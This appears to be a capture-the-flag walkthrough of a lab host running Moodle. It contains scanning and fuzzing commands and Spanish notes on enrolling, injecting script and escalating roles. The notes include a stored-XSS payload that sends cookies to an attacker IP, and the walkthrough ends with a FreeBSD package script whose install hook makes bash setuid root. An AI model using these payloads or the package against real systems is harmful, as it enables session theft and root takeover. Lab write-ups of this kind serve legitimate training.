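# Enumeration commands used against the lab host 10.129.170.50.
# Taken together (full port sweeps, NSE "vuln" probes, nikto, directory and
# vhost brute forcing), this traffic is high-volume and signature-heavy; it is
# the kind of activity IDS/WAF rate and signature rules are expected to flag.

# Map the lab hostnames to the target address. tee -a appends, so re-running
# this line adds a duplicate entry to /etc/hosts.
echo "10.129.170.50 schooled.htb www.schooled.htb" | sudo tee -a /etc/hosts

# Fast all-ports TCP scan with the NSE "vuln" category.
# The output basename differs from the next scan's: both originally wrote to
# "-oA schooled", so the second run overwrote the .nmap/.gnmap/.xml files of
# the first and the vuln-script results were lost.
# NOTE(review): --min-rate=10000 can cost accuracy on a lossy link — confirm
# open ports against the slower scan below.
nmap -A -p- -oA schooled-vuln 10.129.170.50 --min-rate=10000 --script=vuln --script-timeout=15 -v

# Default scripts, service/version detection and OS detection on all TCP ports.
nmap -sC -sV -O -p- -oA schooled 10.129.170.50

# All-ports UDP scan with OS detection, saved under its own basename.
nmap -sU -O -p- -oA schooled-udp 10.129.170.50

# Web server checks against port 80.
nikto -h 10.129.170.50:80

# Directory brute force with 100 threads. -k skips TLS certificate
# verification, which has no effect on this plain-http URL.
gobuster dir -k -u http://10.129.170.50/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

# Virtual-host discovery through the Host header. --hl 461 hides responses
# that are 461 lines long (presumably the default page served for unknown
# vhosts — confirm against a baseline request).
wfuzz -c -u "http://schooled.htb/" -H "Host:FUZZ.schooled.htb" -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt --hl 461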
Agregamos moodle.schooled.htb a /etc/hosts
Jamie Borham
Lianne Carter
Jane Higgins
Manuel Phillips
Me meto en Matemáticas y le doy clic a "Enroll me".
https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md
https://raw.githubusercontent.com/lnxg33k/misc/master/XSS-cookie-stealer.py
No me sirvió. Puse esto en el campo de texto de MoodleNet:
<script>new Image().src="http://10.10.14.1/bogus.php?output="+document.cookie;</script>
Cambiar userlist a 24 y roletoassign a 1.
Metemos a Lianne Carter como estudiante.
Le damos clic a Lianne Carter y luego a "Log in as".
Vamos a "Define roles".
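#!/bin/sh
# Builds a minimal FreeBSD package ("mypackage") from a staging directory:
# a manifest, two install scripts and a single config file, packed with
# pkg create into the current directory.
#
# Security-relevant point: +POST_INSTALL and +PRE_DEINSTALL are executed by
# pkg with the privileges of whoever installs or removes the package. When
# that is root (for example through a sudo rule that allows "pkg install"),
# the script bodies below run as root. A sudo grant for pkg install should
# therefore be treated as root-equivalent, and new setuid/setgid files under
# /usr/local/bin are a useful detection signal for this kind of package.
set -eu

STAGEDIR=~/stage

# Start from an empty staging tree. ":?" aborts if STAGEDIR is empty or unset
# instead of letting rm -rf run against an empty path.
rm -rf -- "${STAGEDIR:?}"
mkdir -p -- "${STAGEDIR}"

# Runs before the package is removed: sets root's login shell to /bin/sh.
# NOTE(review): this does not clear the mode bits set by +POST_INSTALL, so
# removing the package leaves /usr/local/bin/bash setuid/setgid; that has to
# be reverted separately (chmod -s) when cleaning up the host.
# The delimiter is quoted so the script text is written out literally.
cat > "${STAGEDIR}/+PRE_DEINSTALL" <<'EOF'
# careful here, this may clobber your system
echo "Resetting root shell"
pw usermod -n root -s /bin/sh
EOF

# Runs after the package is installed: sets the setuid and setgid bits on
# /usr/local/bin/bash. This is the persistent, host-wide change the package
# makes; it affects every local user, not only the one who installed it.
cat > "${STAGEDIR}/+POST_INSTALL" <<'EOF'
# careful here, this may clobber your system
echo "Registering root shell"
chmod +s /usr/local/bin/bash
EOF

# Package metadata. The www field is a plain URL; the markdown link wrapper
# it carried before was copy-paste residue, not a valid manifest value.
cat > "${STAGEDIR}/+MANIFEST" <<'EOF'
name: mypackage
version: "1.0_5"
origin: sysutils/mypackage
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF

# The only payload file, plus the packing list that names it.
mkdir -p -- "${STAGEDIR}/usr/local/etc"
echo "# hello world" > "${STAGEDIR}/usr/local/etc/my.conf"
echo "/usr/local/etc/my.conf" > "${STAGEDIR}/plist"

# -m: metadata directory, -r: root of the staged files, -p: packing list,
# -o: output directory for the built package.
pkg create -m "${STAGEDIR}/" -r "${STAGEDIR}/" -p "${STAGEDIR}/plist" -o .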